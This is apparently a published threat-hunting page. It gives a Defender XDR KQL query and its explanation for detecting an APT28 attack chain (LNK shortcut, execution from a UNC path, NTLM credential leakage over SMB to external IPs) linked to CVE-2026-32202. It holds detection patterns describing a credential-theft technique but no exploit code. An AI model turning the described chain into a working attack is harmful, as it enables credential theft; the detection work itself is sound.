Query Details
APT28 Kill Chain LNK To UNC To SMB For Credential Exfiltration
Query
# *APT28 Kill Chain for CVE-2026-32202*
## Query Information
#### MITRE ATT&CK Technique(s)
| Technique ID | Title | Link |
| --- | --- | --- |
| T1566.001 | Phishing: Spearphishing Attachment | https://attack.mitre.org/techniques/T1566/001 |
| T1557.001 | Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | https://attack.mitre.org/techniques/T1557/001/ |
#### Description
This rule detects a multi-stage attack chain attributed to APT28, starting with initial access via a malicious LNK file, followed by execution of a CPL/DLL/EXE from a UNC path, and culminating in NTLM credential exfiltration over SMB to a non-private IP address. This chain is associated with exploitation of CVE-2026-32202.
#### Author <Optional>
- **Name: Benjamin Zulliger**
- **Github: https://github.com/benscha/KQLAdvancedHunting**
- **LinkedIn: https://www.linkedin.com/in/benjamin-zulliger/**
#### References
- https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
## Defender XDR
```KQL
// APT28 Kill Chain for CVE-2026-32202
// https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
// LNK → CPL/UNC → SMB → NTLM Exfil
let timeframe = 7d;
let InitialAccess_LNK = DeviceProcessEvents
| where TimeGenerated > ago(timeframe)
| where InitiatingProcessCommandLine has ".lnk"
| project DeviceId, LNK_TriggerTime = TimeGenerated, LNK_CommandLine = InitiatingProcessCommandLine;
let Execution_UNC = DeviceProcessEvents
| where TimeGenerated > ago(timeframe)
| where ProcessCommandLine matches regex @"\\\\[a-zA-Z0-9\-\.]{4,}\\"
| where ProcessCommandLine has_any (".cpl", ".dll", ".exe")
| project DeviceId, UNC_LoadTime = TimeGenerated, UNC_CommandLine = ProcessCommandLine;
let Exfiltration_SMB = DeviceNetworkEvents
| where TimeGenerated > ago(timeframe)
| where RemotePort == 445
| where not(ipv4_is_private(RemoteIP))
| project DeviceId, SMB_ConnectTime = TimeGenerated, RemoteIP;
InitialAccess_LNK
| join kind=inner Execution_UNC on DeviceId
| where UNC_LoadTime between (LNK_TriggerTime .. (LNK_TriggerTime + 2m))
| join kind=inner Exfiltration_SMB on DeviceId
| where SMB_ConnectTime between (UNC_LoadTime .. (UNC_LoadTime + 2m))
| project
DeviceId,
LNK_Time = LNK_TriggerTime,
UNC_Time = UNC_LoadTime,
SMB_Time = SMB_ConnectTime,
LNK_CommandLine,
UNC_CommandLine,
RemoteIP
| extend
AlertTitle = "APT28 Kill Chain: LNK→UNC→SMB (CVE-2026-32202)",
Severity = "Critical",
MITRE = "T1566.001 → T1187 → T1557.001"
```
Explanation
This query is designed to detect a specific attack pattern associated with the APT28 group, exploiting a vulnerability identified as CVE-2026-32202. Here's a simple breakdown of what the query does:
-
Timeframe: The query looks at events from the past 7 days.
-
Initial Access Detection: It searches for the execution of a malicious shortcut file (with a
.lnkextension) on devices. This is the first step in the attack chain, where the attacker gains initial access. -
Execution Detection: It then checks for the execution of files (like
.cpl,.dll, or.exe) from a network path (UNC path). This indicates the attacker is executing additional malicious code from a network location. -
Exfiltration Detection: Finally, it looks for network connections over SMB (port 445) to external IP addresses (non-private IPs), suggesting that the attacker is exfiltrating credentials using NTLM.
-
Correlation: The query correlates these events by matching them based on the device and ensuring the sequence of events happens within a short time frame (2 minutes between each step).
-
Output: If the pattern is detected, it generates an alert with details such as the times of each event, the command lines used, and the external IP address involved. The alert is labeled as "Critical" and maps to specific MITRE ATT&CK techniques related to phishing, execution, and credential access.
Overall, this query helps identify a sophisticated multi-stage attack involving phishing, code execution from a network path, and credential theft, all linked to a known vulnerability.
Details
Benjamin Zulliger
Released: April 28, 2026
Tables
Keywords
Operators